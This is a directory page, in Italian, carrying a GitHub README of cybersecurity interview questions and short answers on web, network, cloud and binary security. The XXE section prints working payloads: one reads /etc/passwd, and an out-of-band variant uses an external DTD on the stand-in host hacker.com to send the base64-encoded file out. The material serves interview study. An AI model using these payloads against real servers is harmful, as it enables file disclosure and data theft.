Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Interview_Tips — Riepilogo delle domande di colloquio sulla sicurezza informatica che ho affrontato, spero sia d'aiuto. | Kitploit
Strumenti/GitHubGitHub/jigerjain/interview_tips
Sicurezza WebSicurezza di ReteCrittografiaSicurezza CloudApprendimento e FormazioneRisorse CuratePercorsi e CorsiBinary Exploitation
GitHubjigerjain/interview_tips

Interview_Tips

Riepilogo delle domande di colloquio sulla sicurezza informatica che ho affrontato, spero sia d'aiuto.

Vedi Repository
691766 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Consigli per i Colloqui (Sicurezza Informatica)

Questa pagina è un riepilogo dei colloqui che ho affrontato, coprendo una discreta varietà di ruoli, ricevendo diversi rifiuti, ma imparando da ogni colloquio, raccogliendo feedback costruttivi e andando avanti. Spero che queste domande/consigli possano esserti utili.

I ruoli che generalmente copre sono i seguenti:

  • Tirocinante in Cybersecurity
  • Tirocinante in Penetration Testing / Red Team
  • Tirocinante in Sicurezza Web/Applicazioni Web
  • Tirocinante in Sicurezza dei Prodotti
  • Tirocinante in Sicurezza delle Infrastrutture

Consiglio rapido:

  • Rivedi il tuo curriculum e poniti domande ad esso correlate in anticipo
  • Se non conosci una domanda/concetto, non girare intorno all'argomento, comunica che puoi impararlo se ti viene dato un ambiente in cui lavorare
    Non puoi sapere tutto, sii umile nell'accettare se hai risposto qualcosa di sbagliato o se hai bisogno di chiarimenti
  • Prepara una breve bio su di te in anticipo per presentarti
  • Sii sicuro del tuo obiettivo finale e del perché la sicurezza informatica?
  • Infine, chiedi un feedback alla fine del colloquio, perché: aiuta a conoscere e colmare le lacune della tua attuale conoscenza nella sicurezza informatica

Ho cercato di annotare qui di seguito tutte le possibili domande che ho incontrato e ho fornito risposte per alcune. Per il resto puoi cercare su Google le risposte specifiche e se vuoi approfondire. Inoltre, alla fine ci sono alcuni riferimenti, dai un'occhiata. Sono stati davvero utili.

Mi piacerebbe aggiungere altre domande man mano che vado avanti e controllo i miei appunti, ma apprezzerei se potessi darmi un feedback costruttivo contattandomi via [email protected]. Se incontri qualcosa che non è coperto qui, sentiti libero di condividerlo.

Domande comuni

  1. Triadi di sicurezza:

Cos'è la CIA?

  • Riservatezza
  • Integrità
  • Disponibilità

Cos'è AAA?

  • Autenticazione
  • Autorizzazione
  • Accounting
  1. Differenza tra Minaccia, Vulnerabilità, Exploit e Rischio e come questi sono correlati agli Asset
  • Minaccia:
    Una minaccia è ciò contro cui stiamo cercando di proteggerci
  • Vulnerabilità:
    Una vulnerabilità è una debolezza o una lacuna nei nostri sforzi di protezione
  • Exploit:
    Un'abilità/programma (può essere un software o una capacità di ingegneria sociale) sviluppato per attaccare un asset sfruttando una vulnerabilità
  • Rischio:
    Il rischio è l'intersezione di asset, minacce e vulnerabilità
  • Asset:
    Un asset è ciò che stiamo cercando di proteggere
  1. Cos'è l'IAM e perché viene utilizzato?
    L'IAM è la Gestione delle Identità e degli Accessi (Identity Access Management) utilizzata per separare ruoli e responsabilità all'interno di un'organizzazione. È un elemento critico nella sicurezza. Aiuta a mantenere la sicurezza dei livelli di accesso e i privilegi

Sicurezza in generale

Fasi di un attacco di intrusione di rete:

  • Ricognizione / Raccolta di informazioni
  • Ottenere l'accesso necessario
  • Mantenere l'accesso
  • Coprire le tracce (eliminare log, backdoor e nascondere tutti i controlli)

Sicurezza delle Applicazioni Web

  1. Domande comuni:
  • OWASP Top 10

  • Cos'è l'XSS (Cross-site Scripting)

    • Esercitati con XSS su: [https://xss-game.appspot.com/]
    • Come contrastare l'XSS: Utilizza brevemente un'appropriata validazione degli input
    • Cerca l'intestazione CSP (Content-Security-Policy)
    • Diversi tipi di XSS: Reflected, Stored e DOM-based
    • Quali sono le sorgenti (sources) e i sink nel DOM che potrebbero portare a XSS:
      [https://www.netsparker.com/blog/web-security/dom-based-cross-site-scripting-vulnerability/]
  • Cos'è il CSRF Questa è la domanda più azzeccata che ogni intervistatore amerebbe fare
    Consiglio rapido: Sii breve, se ti viene chiesto, spiega solo allora l'intera storia

    Il Cross-Site Request Forgery (CSRF) è un attacco che costringe un utente finale a eseguire azioni indesiderate su un'applicazione web in cui è attualmente autenticato. Gli attacchi CSRF prendono di mira specificamente le richieste che modificano lo stato, non il furto di dati, poiché l'attaccante non ha modo di vedere la risposta alla richiesta contraffatta. Con un piccolo aiuto dell'ingegneria sociale (come l'invio di un link via email o chat), un attaccante può ingannare gli utenti di un'applicazione web spingendoli a eseguire azioni scelte dall'attaccante. Se la vittima è un utente normale, un attacco CSRF riuscito può costringere l'utente a eseguire richieste di modifica dello stato come trasferire fondi, cambiare il proprio indirizzo email e così via. Se la vittima è un account amministrativo, il CSRF può compromettere l'intera applicazione web.

  • Come contrastare il CSRF:
    Utilizzare token Anti-CSRF
    Utilizzare la same-origin policy
    Utilizzo dell'intestazione Referrer

  • Cos'è la codifica HTML/URL

  • Il protocollo HTTP è stateless?
    HTTP è intrinsecamente un protocollo stateless, tuttavia il server utilizza i cookie per renderlo stateful

  • Quali sono i tipi di injection: SQL, Command, OS

  • Come contrastare le SQL injection
    Utilizzare query parametrizzate e stored procedure

  1. Controlla le intestazioni che aiutano a fornire sicurezza (Controlla gli URL e leggi il contenuto, ti aiuterà a costruire le tue basi):
  • CSP (Content-Security Policy) [https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy]
    [https://www.html5rocks.com/en/tutorials/security/content-security-policy/]
  • CORS (Cross-Origin Resource Sharing) [https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS]
  • Same-Origin policy [https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy]
  1. Ci sarebbero scenari rari in cui un intervistatore potrebbe chiedere queste cose; ne ho incontrate alcune nelle fasi successive di alcuni colloqui e ho pensato di menzionarle:
  • Cos'è XXE (XML External Entities)?
    L'iniezione di entità esterne XML (nota anche come XXE) è una vulnerabilità di sicurezza web che consente a un attaccante di interferire con l'elaborazione dei dati XML di un'applicazione. Spesso consente a un attaccante di visualizzare file sul filesystem del server applicativo e di interagire con qualsiasi backend o sistema esterno a cui l'applicazione stessa può accedere.
    Controlla questo [https://portswigger.net/web-security/xxe]
    Es:
    root@kitploit:~
    <?xml version="1.0" encoding="UTF-8"?>    
    <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>     
    <stockCheck><productId>&xxe;</productId></stockCheck> 
    
    In alcune situazioni, un attaccante può escalare un attacco XXE per compromettere il server sottostante o altre infrastrutture backend, sfruttando la vulnerabilità XXE per eseguire attacchi di server-side request forgery (SSRF).
  • Out-Of-Band - utilizzando le entità XML, i dati dal server possono essere catturati e inviati a hacker.com (nessun output dal server richiesto)

Da iniettare: document.xml

root@kitploit:~
<!DOCTYPE root [
    <!ENTITY % remote SYSTEM "http://hacker.com/evil.dtd">
    %remote; %intern; %xxe;
]>
<root>&xxe;</root> - puoi cambiare l'entità xxe in entità generale

Host esterno: http://hacker.com/evil.dtd

root@kitploit:~
<!ENTITY % payl SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd">
<!ENTITY % intern "<!ENTITY &#37; xxe SYSTEM 'http://hacker.com/result-is?%payl;'>">
                    --- OPPURE ---
<!ENTITY % intern "<!ENTITY &#37; xxe SYSTEM 'file://%payl;'>"> - considera error-based

Rif: [https://phonexicum.github.io/infosec/xxe.html]

  • Cos'è un attacco SSRF (Server Side Request Forgery) Potrebbe essere usato per fare pivot nella rete interna
  • Come si protegge un'architettura web a 3 livelli
  • Cos'è Kerberos https://www.varonis.com/blog/kerberos-authentication-explained/
  • Cos'è la Gestione dei Segreti (Secret Management) e i Vault https://www.hashicorp.com/resources/introduction-vault-whiteboard-armon-dadgar

Sicurezza di Rete

  • Differenza tra crittografia simmetrica e asimmetrica
  • Differenza tra crittografia a chiave pubblica e crittografia a chiave asimmetrica: Sono la stessa cosa Domanda trabocchetto
  • Modalità nella crittografia (Es. EBC, CBC, ecc.)
  • Cos'è la Perfect Forward Secrecy
    [https://scotthelme.co.uk/perfect-forward-secrecy/] In poche parole, il compito principale del PFS è garantire che, nel caso in cui la chiave privata di un server venga compromessa, un attaccante non possa decrittare alcuna comunicazione TLS precedente. La Perfect Forward Secrecy è possibile utilizzando lo scambio di chiavi effimero Diffie-Hellman, che fornisce nuove chiavi per ogni sessione ed è valido finché la sessione è attiva.
  • Approfondimento sulle suite di cifratura:
    Es: TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
    https://scotthelme.co.uk/https-cheat-sheet/
  • Durante la compressione e la crittografia dei dati, cosa succede prima, compressione o crittografia?
    La compressione avviene prima, poiché l'entropia (diffusione) della casualità nei dati è bassa, quindi è possibile ottenere una compressione maggiore; pertanto è vantaggioso prima comprimere e poi crittografare.
  • Differenza tra Crittografia, Codifica, Hashing e Offuscamento
    https://danielmiessler.com/study/encoding-encryption-hashing-obfuscation/
  • Cos'è una rainbow table: Brevemente, è una raccolta di hash precalcolati
  • Come funziona TLS?
    Questa è un'immagine fantastica che ho trovato, mi ha aiutato a capire TLS in parole semplici
    http://i.imgur.com/5T2fJsG.png
  • Cos'è il Certificate Signing
  • Come funziona Traceroute
  • Come funziona Nmap
  • Cos'è una Certification Authority (CA)
  • Cos'è una DMZ e quali sono i componenti coinvolti
  • Su quale porta funziona il ping?
    Una domanda trabocchetto, per esserne sicuri, ma importante.
    Suggerimento: ICMP è un protocollo di livello 3 (non funziona su una porta). Una buona variante di questa domanda è chiedere se il ping usa TCP o UDP. Una risposta con uno dei due è un fallimento, poiché sono protocolli di livello 4.

Sicurezza del Cloud

Parlerò in generale in termini di AWS, tuttavia ci sono altri provider cloud come Azure, GCP, Digital Ocean, ecc..

  • Componenti generali di AWS:
    S3, EC2, Buckets, IAM, Cloud Trail, Cloud Watch
  • Cos'è l'IAM e i suoi componenti: Per essere breve, l'IAM è usato per la gestione degli accessi dove utilizza Ruoli (per accessi temporanei), Policy, Gruppi e Utenti per il suo funzionamento
  • Cos'è EC2: È un'istanza elastica per creare una Macchina Virtuale
  • EC2 ha la crittografia: Sì, ce l'ha. La crittografia Amazon EBS offre una semplice soluzione di crittografia per i tuoi volumi EBS senza la necessità di costruire, mantenere e proteggere la tua infrastruttura di gestione delle chiavi. La crittografia Amazon EBS utilizza le chiavi master del cliente (CMK) di AWS Key Management Service (AWS KMS) quando crea volumi crittografati e qualsiasi snapshot creati da essi. Altro può essere trovato ... qui sotto https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSEncryption.html

Exploitation di Binari

  • Strumenti che potrebbero essere usati per il debug di un binario:
    Linux: gdb, radare, clutter (GUI per radare)
    Windows: IDA, Binary Ninja
  • Cos'è il Buffer Overflow
  • Cos'è la vulnerabilità Format String
  • Differenza tra regione Stack e Heap (Potresti considerare di guardare anche le regioni Code, Text e Bss)
  • Cosa sono gli Stack Cookies
  • Cos'è l'ASLR e perché viene usato?
  • Cos'è la memoria non eseguibile?

Riferimenti

Risorse di apprendimento:
https://regexone.com/ (Le Espressioni Regolari sono un must!)
https://portswigger.net/web-security/
OWASP Top 10:
https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf
Domande per colloqui Infosec:
https://danielmiessler.com/study/infosec_interview_questions
Domande Top per Pentest:
https://resources.infosecinstitute.com/top-30-penetration-tester-pentester-interview-questions-and-answers-for-2019/#gref
Consigli su Python:
https://www.codementor.io/sheena/essential-python-interview-questions-du107ozr6
Guida utente AWS:
https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/concepts.html
Approfondimento su SMB e Samba: https://fitzcarraldoblog.wordpress.com/2016/10/17/a-correct-method-of-configuring-samba-for-browsing-smb-shares-in-a-home-network/

Scarica lo strumento